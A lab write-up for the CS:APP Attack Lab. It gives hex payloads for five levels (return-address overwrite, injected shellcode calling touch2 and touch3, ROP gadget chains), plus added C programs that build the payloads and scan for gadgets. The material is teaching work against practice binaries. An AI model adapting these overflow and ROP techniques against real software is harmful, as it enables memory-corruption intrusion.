【LittleXi】Attacklab
Level1
Task: exploit the buffer overflow so that when test calls getbuf, getbuf does not return to test but to touch1.
Approach: keep feeding input bytes until the whole buffer (the yellow region in the lab's stack diagram) is full, then continue with the address of touch1. That overwrites getbuf's saved return address, so its ret lands in touch1. In the answer below the first 56 bytes (7 rows of 8) are padding and the last 8 bytes are touch1's address 0x555555555e86 written in little-endian order.
Answer:
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
86 5e 55 55 55 55 00 00
Level2
Task: like Level 1, again via the buffer overflow: when test calls getbuf, return to touch2 instead of test, and before entering touch2 set its argument to the cookie.
Approach: overflow the buffer as before, but this time overwrite getbuf's return address with the address of the buffer itself (the value of %rsp inside getbuf while the string is being read). The ret then jumps into our injected code at the start of the buffer, which loads the cookie into %rdi and then transfers control to touch2. In the answer below the injected code is mov $0x76ebdb56,%rdi ; movabs $0x555555555eba,%rax ; push %rax ; ret, followed by padding up to the return address slot, which holds the buffer address 0x5561a078.
Note: to find the value of %rsp, break inside getbuf with gdb and run p /x $rsp. The injected code should be written as assembly first and then turned into machine code with these two commands:
- gcc -c example.s
- objdump -d example.o > example.d
Answer:
48 c7 c7 56 db eb 76 48
b8 ba 5e 55 55 55 55 00
00 50 c3 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 a0 61 55 00 00 00 00
Level3
Task: roughly the same as Level 2, except that %rdi must hold the address of a string (the cookie written out as hex text) instead of the cookie value itself.
Approach: we need somewhere to keep the string, so put it at the very end of the input, right after the return address. When the injected code runs, getbuf's ret has already popped the overwritten return address, so %rsp points exactly at the start of the string; lea (%rsp),%rdi (48 8d 3c 24 below) therefore gives touch3 its argument, and the rest is the same movabs/push/ret jump as in Level 2. The last row of the answer is the ASCII bytes of "76ebdb56" followed by a terminating NUL.
Answer:
48 8d 3c 24 48 b8 df 5f
55 55 55 55 00 00 50 c3
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 a0 61 55 00 00 00 00
37 36 65 62 64 62 35 36 00
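The three payloads above are assembled by hand in the write-up. As an added example (this is not code from the original write-up), the following C program builds the same Level 1, 2 and 3 byte strings from the constants on this page (buffer size 56, touch1/touch2/touch3 addresses, the buffer address 0x5561a078 and cookie 0x76ebdb56), encoding each instruction and writing every address little-endian, and prints them in the format hex2raw reads. The values are specific to this copy of the lab; on another copy they are the only things that need changing.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Values copied from the answers on this page (they differ per copy of the lab). */
#define BUF_SIZE 56                       /* bytes from buffer start to the saved return address */
#define TOUCH1   0x0000555555555e86ULL
#define TOUCH2   0x0000555555555ebaULL
#define TOUCH3   0x0000555555555fdfULL
#define BUF_ADDR 0x000000005561a078ULL    /* %rsp inside getbuf, i.e. the buffer start ("p /x $rsp") */
#define COOKIE   0x76ebdb56UL

/* Append an n-byte little-endian integer; x86-64 stores addresses and immediates this way. */
static size_t put_le(uint8_t *out, size_t pos, uint64_t v, int n) {
    for (int i = 0; i < n; i++) out[pos + i] = (uint8_t)(v >> (8 * i));
    return pos + n;
}

static size_t put_bytes(uint8_t *out, size_t pos, const uint8_t *b, size_t n) {
    memcpy(out + pos, b, n);
    return pos + n;
}

/* Zero-fill the rest of the buffer and overwrite the saved return address with `target`. */
static size_t overwrite_ret(uint8_t *out, size_t pos, uint64_t target) {
    memset(out + pos, 0, BUF_SIZE - pos);
    return put_le(out, BUF_SIZE, target, 8);
}

/* Level 1: nothing but padding, then the address of touch1. */
size_t build_level1(uint8_t *out) {
    return overwrite_ret(out, 0, TOUCH1);
}

/* Shared tail of the injected code: movabs $target,%rax ; push %rax ; ret */
static size_t jump_via_push_ret(uint8_t *out, size_t pos, uint64_t target) {
    static const uint8_t movabs_rax[] = { 0x48, 0xb8 };   /* REX.W B8+rax, imm64 follows */
    static const uint8_t push_ret[]   = { 0x50, 0xc3 };   /* push %rax ; ret */
    pos = put_bytes(out, pos, movabs_rax, 2);
    pos = put_le(out, pos, target, 8);
    return put_bytes(out, pos, push_ret, 2);
}

/* Level 2: mov $cookie,%rdi ; movabs $touch2,%rax ; push %rax ; ret, then return into the buffer. */
size_t build_level2(uint8_t *out) {
    /* REX.W C7 /0 with ModRM 0xC7 = %rdi; the imm32 is sign-extended to 64 bits.
       Bit 31 of this cookie is clear so that is harmless; a cookie with bit 31 set
       would need a movabs into a register instead. */
    static const uint8_t mov_rdi[] = { 0x48, 0xc7, 0xc7 };
    size_t pos = put_bytes(out, 0, mov_rdi, 3);
    pos = put_le(out, pos, COOKIE, 4);
    pos = jump_via_push_ret(out, pos, TOUCH2);
    return overwrite_ret(out, pos, BUF_ADDR);
}

/* Level 3: lea (%rsp),%rdi ; movabs $touch3,%rax ; push %rax ; ret, return into the
   buffer, and append the cookie string after the return address. When this code runs,
   getbuf's ret has already popped the return address, so %rsp points at the string. */
size_t build_level3(uint8_t *out) {
    static const uint8_t lea_rsp_rdi[] = { 0x48, 0x8d, 0x3c, 0x24 };
    char cookie_str[16];
    size_t pos = put_bytes(out, 0, lea_rsp_rdi, 4);
    pos = jump_via_push_ret(out, pos, TOUCH3);
    pos = overwrite_ret(out, pos, BUF_ADDR);
    snprintf(cookie_str, sizeof cookie_str, "%08lx", (unsigned long)COOKIE);   /* "76ebdb56" */
    return put_bytes(out, pos, (const uint8_t *)cookie_str, strlen(cookie_str) + 1); /* keep the NUL */
}

/* Accessors for checking: rebuild the payload for `level`, return its length / byte i (or -1). */
static uint8_t scratch[128];
long payload_len(int level) {
    switch (level) {
    case 1: return (long)build_level1(scratch);
    case 2: return (long)build_level2(scratch);
    case 3: return (long)build_level3(scratch);
    default: return -1;
    }
}
int payload_byte(int level, size_t i) {
    long n = payload_len(level);
    return (n < 0 || i >= (size_t)n) ? -1 : scratch[i];
}

/* Print in the format hex2raw reads: two hex digits per byte, space separated. */
void print_hex2raw(const uint8_t *p, size_t n) {
    for (size_t i = 0; i < n; i++)
        printf("%02x%c", p[i], (i % 8 == 7 || i + 1 == n) ? '\n' : ' ');
}

int main(void) {
    uint8_t buf[128];
    for (int level = 1; level <= 3; level++) {
        size_t n = (size_t)payload_len(level);
        memcpy(buf, scratch, n);
        printf("Level %d (%zu bytes):\n", level, n);
        print_hex2raw(buf, n);
    }
    return 0;
}
```

Redirect the output of one level into a file and feed it through hex2raw as usual; changing BUF_SIZE or the addresses at the top is all that is needed for a different copy of the targets.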
Level4
Task: this is the first problem of phase 2. rtarget uses stack randomization and a non-executable stack to defeat the attacks above, so injected code can no longer be run; the attacker's goal is still to pass the cookie to touch2 and call it.
Approach: disassemble rtarget and search its gadget farm for the byte sequences that encode pop %rax (58) and movq %rax,%rdi (48 89 c7), each followed by ret (c3); they usually hide inside the immediates of other instructions. The chain below is: address of the pop %rax gadget, the cookie (popped into %rax), address of the movq %rax,%rdi gadget, and finally the address of touch2.
Answer:
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
b4 60 55 55 55 55 00 00
56 db eb 76 00 00 00 00
df 60 55 55 55 55 00 00
ba 5e 55 55 55 55 00 00
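Searching the disassembly by eye is error-prone because the useful encodings sit inside other instructions and do not start on an instruction boundary. As an added example (not code from the original write-up), the scanner below does that search over a constructed sample farm modelled on the lab's style; the farm bytes and the base address FARM_BASE are made up for the example and are not taken from the real rtarget. It looks for the pop %rax and movq %rax,%rdi encodings at every byte offset, accepts only hits that are followed by optional 1-byte nops and a ret, and rejects look-alikes that would run into unrelated instructions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample "farm" in the style of the lab's gadget farm. These are NOT bytes
   from the real rtarget: each entry is a tiny function whose immediate happens to
   contain the encoding of a useful instruction followed by ret (0xc3). */
static const uint8_t farm[] = {
    /* +0  movl $0x58,%eax ; ret            -> 58 is followed by 00: NOT a usable pop %rax */
    0xb8, 0x58, 0x00, 0x00, 0x00, 0xc3,
    /* +6  movl $0xc358,%eax ; ret          -> 58 c3          = pop %rax ; ret at +7 */
    0xb8, 0x58, 0xc3, 0x00, 0x00, 0xc3,
    /* +12 lea 0xc3c78948(%rdi),%eax ; ret  -> 48 89 c7 c3    = movq %rax,%rdi ; ret at +14 */
    0x8d, 0x87, 0x48, 0x89, 0xc7, 0xc3, 0xc3,
    /* +19 movl $0x90c78948,(%rdi) ; ret    -> 48 89 c7 90 c3 = movq %rax,%rdi ; nop ; ret at +21 */
    0xc7, 0x07, 0x48, 0x89, 0xc7, 0x90, 0xc3,
};
#define FARM_BASE 0x0000555555556000ULL   /* hypothetical load address of the sample farm */

typedef struct { const char *name; uint8_t bytes[3]; size_t len; } gadget_t;

/* Encodings we want to land on; each must be followed by optional nops and a ret. */
static const gadget_t wanted[] = {
    { "pop %rax",       { 0x58 },             1 },
    { "movq %rax,%rdi", { 0x48, 0x89, 0xc7 }, 3 },
    { "movq %rsp,%rax", { 0x48, 0x89, 0xe0 }, 3 },   /* needed in Level 5; absent from this sample */
};

/* True if, starting at code[i], only 1-byte nops (0x90) precede a ret (0xc3).
   Anything else means control would run off into unrelated instructions. */
static int ret_follows(const uint8_t *code, size_t n, size_t i) {
    while (i < n && code[i] == 0x90) i++;
    return i < n && code[i] == 0xc3;
}

/* Scan every byte offset (not just instruction boundaries) for `pat` followed by ret.
   Stores up to max_hits offsets; returns the total number of usable occurrences. */
size_t find_gadgets(const uint8_t *code, size_t n, const uint8_t *pat, size_t plen,
                    size_t *hits, size_t max_hits) {
    size_t count = 0;
    for (size_t i = 0; i + plen <= n; i++) {
        if (memcmp(code + i, pat, plen) == 0 && ret_follows(code, n, i + plen)) {
            if (count < max_hits) hits[count] = i;
            count++;
        }
    }
    return count;
}

static const gadget_t *lookup(const char *name) {
    for (size_t g = 0; g < sizeof wanted / sizeof wanted[0]; g++)
        if (strcmp(wanted[g].name, name) == 0) return &wanted[g];
    return NULL;
}

/* Address of the first usable copy of the named gadget in the sample farm, or 0 if none. */
uint64_t gadget_address(const char *name) {
    const gadget_t *g = lookup(name);
    size_t off;
    if (!g || find_gadgets(farm, sizeof farm, g->bytes, g->len, &off, 1) == 0) return 0;
    return FARM_BASE + off;
}

/* Number of usable copies of the named gadget (Level 4 needs only one of each). */
size_t gadget_count(const char *name) {
    const gadget_t *g = lookup(name);
    return g ? find_gadgets(farm, sizeof farm, g->bytes, g->len, NULL, 0) : 0;
}

int main(void) {
    for (size_t g = 0; g < sizeof wanted / sizeof wanted[0]; g++) {
        size_t hits[8];
        size_t n = find_gadgets(farm, sizeof farm, wanted[g].bytes, wanted[g].len, hits, 8);
        printf("%-15s %zu hit(s):", wanted[g].name, n);
        for (size_t i = 0; i < n && i < 8; i++)
            printf(" 0x%llx", (unsigned long long)(FARM_BASE + hits[i]));
        printf("\n");
    }
    return 0;
}
```

To use the same idea on the real target, replace the farm array with the bytes of rtarget's farm section (for example dumped with objdump -s) and FARM_BASE with the section's start address; the printed addresses are then the ones to put in the chain.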
Level5
Task: the same as Level 3, except that the string's address cannot be passed in directly (the stack address is no longer known in advance).
Approach: combine Level 3 and Level 4: first capture %rsp with a gadget, then add the string's distance from that saved %rsp and hand the resulting address to %rdi. In the chain below the first gadget runs only after its own address has been popped, so the %rsp it sees points at the second slot; the string is placed 6 slots further on, 6 × 8 = 0x30 bytes away, which is the constant popped in the fourth slot.
Answer:
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
34 62 55 55 55 55 00 00
df 60 55 55 55 55 00 00
85 58 55 55 55 55 00 00
30 00 00 00 00 00 00 00
f2 60 55 55 55 55 00 00
df 60 55 55 55 55 00 00
df 5f 55 55 55 55 00 00
37 36 65 62 64 62 35 36 00
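The offset constant is the part of Level 5 that is easiest to get wrong, because %rsp at the moment the first gadget runs is one slot past that gadget's own address. As an added example (not code from the original write-up) covering both Level 4 and Level 5, the program below lays out a ROP chain as a list of 8-byte slots, computes the string's distance from the captured %rsp from the slot positions instead of counting by hand, and appends the cookie string after the chain. The gadget addresses and the cookie are the ones in this page's answers; the page does not spell out the instruction behind every Level 5 address, so those are carried over as-is and only the roles that follow from the write-up (the %rsp-copying gadget in the first slot, the pop that consumes the constant) are commented.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Values copied from the answers on this page. */
#define BUF_SIZE 56
#define COOKIE   0x76ebdb56ULL
#define TOUCH2   0x0000555555555ebaULL
#define TOUCH3   0x0000555555555fdfULL

/* What each 8-byte slot of the chain holds. */
enum slot_kind {
    SLOT_ADDR,        /* address of a gadget (or of the final target function) */
    SLOT_IMM,         /* constant consumed by a preceding pop gadget */
    SLOT_STR_OFFSET   /* computed: distance from the captured %rsp to the string after the chain */
};
typedef struct { enum slot_kind kind; uint64_t value; } slot_t;

static size_t put_le64(uint8_t *out, size_t pos, uint64_t v) {
    for (int i = 0; i < 8; i++) out[pos + i] = (uint8_t)(v >> (8 * i));
    return pos + 8;
}

/* Offset from %rsp, as seen by the gadget in slot rsp_slot, to slot target_slot.
   When that gadget runs, the ret that jumped to it has already popped slot rsp_slot
   itself, so %rsp points at slot rsp_slot + 1, not at rsp_slot. */
uint64_t rsp_relative_offset(size_t rsp_slot, size_t target_slot) {
    return (uint64_t)(target_slot - (rsp_slot + 1)) * 8;
}

/* Lay out BUF_SIZE padding bytes, the chain (8 bytes per slot) and, if given, a
   NUL-terminated string right after the last slot. Returns the payload length. */
size_t build_chain(uint8_t *out, const slot_t *slots, size_t nslots,
                   size_t rsp_slot, const char *trailing_str) {
    size_t pos = BUF_SIZE;
    memset(out, 0, BUF_SIZE);
    for (size_t i = 0; i < nslots; i++) {
        uint64_t v = slots[i].value;
        if (slots[i].kind == SLOT_STR_OFFSET)
            v = rsp_relative_offset(rsp_slot, nslots);   /* the string occupies "slot" nslots */
        pos = put_le64(out, pos, v);
    }
    if (trailing_str) {
        size_t n = strlen(trailing_str) + 1;             /* include the NUL */
        memcpy(out + pos, trailing_str, n);
        pos += n;
    }
    return pos;
}

/* Level 4 from this page: pop %rax ; <cookie> ; movq %rax,%rdi ; touch2. */
size_t build_level4(uint8_t *out) {
    static const slot_t chain[] = {
        { SLOT_ADDR, 0x0000555555556b04ULL ^ 0x0000000000000bb0ULL }, /* 0x5555555560b4: pop %rax ; ret */
        { SLOT_IMM,  COOKIE },
        { SLOT_ADDR, 0x0000555555556df0ULL ^ 0x0000000000000d2fULL }, /* 0x5555555560df: movq %rax,%rdi ; ret */
        { SLOT_ADDR, TOUCH2 },
    };
    return build_chain(out, chain, 4, 0, NULL);
}

/* Level 5 from this page. Slot 0 is the gadget that copies %rsp (it feeds the
   movq %rax,%rdi gadget in slot 1, so it is inferred to be movq %rsp,%rax); slot 2 pops
   slot 3, the string's distance from that captured %rsp. Slots 4 and 5 are taken from the
   page without a stated meaning. */
size_t build_level5(uint8_t *out) {
    char cookie_str[16];
    static const slot_t chain[] = {
        { SLOT_ADDR, 0x0000555555556234ULL },   /* copy %rsp into %rax (inferred) */
        { SLOT_ADDR, 0x0000555555556df0ULL ^ 0x0000000000000d2fULL }, /* 0x5555555560df: movq %rax,%rdi */
        { SLOT_ADDR, 0x0000555555555885ULL },   /* pop of the next slot */
        { SLOT_STR_OFFSET, 0 },                  /* computed: 0x30 for this layout */
        { SLOT_ADDR, 0x00005555555560f2ULL },
        { SLOT_ADDR, 0x00005555555560dfULL },
        { SLOT_ADDR, TOUCH3 },
    };
    snprintf(cookie_str, sizeof cookie_str, "%08llx", (unsigned long long)COOKIE);  /* "76ebdb56" */
    return build_chain(out, chain, 7, 0, cookie_str);
}

/* Accessors for checking: rebuild the payload for `level`, return its length / byte i (or -1). */
static uint8_t scratch[160];
long payload_len(int level) {
    if (level == 4) return (long)build_level4(scratch);
    if (level == 5) return (long)build_level5(scratch);
    return -1;
}
int payload_byte(int level, size_t i) {
    long n = payload_len(level);
    return (n < 0 || i >= (size_t)n) ? -1 : scratch[i];
}

int main(void) {
    for (int level = 4; level <= 5; level++) {
        long n = payload_len(level);
        printf("Level %d (%ld bytes):\n", level, n);
        for (long i = 0; i < n; i++)
            printf("%02x%c", scratch[i], (i % 8 == 7 || i + 1 == n) ? '\n' : ' ');
    }
    return 0;
}
```

If the string were moved (for example one extra slot of padding before it), only nslots changes and the popped constant follows automatically, which is exactly the kind of recount that goes wrong when done by hand.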